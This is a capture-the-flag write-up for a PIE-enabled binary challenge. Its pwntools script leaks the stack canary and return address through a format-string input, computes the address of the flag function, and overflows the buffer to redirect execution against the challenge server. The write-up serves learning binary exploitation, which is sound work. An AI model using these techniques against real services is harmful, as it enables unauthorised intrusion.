Rating:

# Finches in a Pie

> There's a service at 88.198.219.20:43174, exploit it to get the flag.

## Description

This problem is extremely similar to [Finches in a Stack](FinchesStack.md), except that PIE is enabled.

## Solution

The exploit is the same, except that we also leak the return address (to `main`), and deduce from it and the constant offset the address of `flag`.

```python
from pwn import *

sh = remote('88.198.219.20', 52692)

print(sh.recvuntil("name?").decode())

# Leak canary and ret address
offset_canary = 11
offset_ret = 15
payload = "%{}$p %{}$p".format(offset_canary, offset_ret)
sh.sendline(payload)

print(sh.recvuntil("you, ").decode(), end="")
answer = sh.recvuntil("!").decode()
print(answer)
answer = answer.split("!")[0]
canary = int(answer.split(" ")[0], 16)
ret_addr = int(answer.split(" ")[1], 16)

# Overflow
offset_canary = 4*6+1
offset_ret = 3*4
offset_flag = 0x56556209 - 0x565563d9
print(sh.recvuntil("cake?").decode())
payload = b" "*offset_canary + p32(canary) + b" "*offset_ret + p32(ret_addr + offset_flag) + "".join([str(i)*4 for i in range(9)]).encode()

sh.sendline(payload)

sh.interactive()
```

Flag: `ractf{B4k1ng_4_p1E!}`

Original writeup (https://github.com/apoirrier/CTFs-writeups/blob/master/AwesomeCTF2020/PWN/FinchesPIE.md).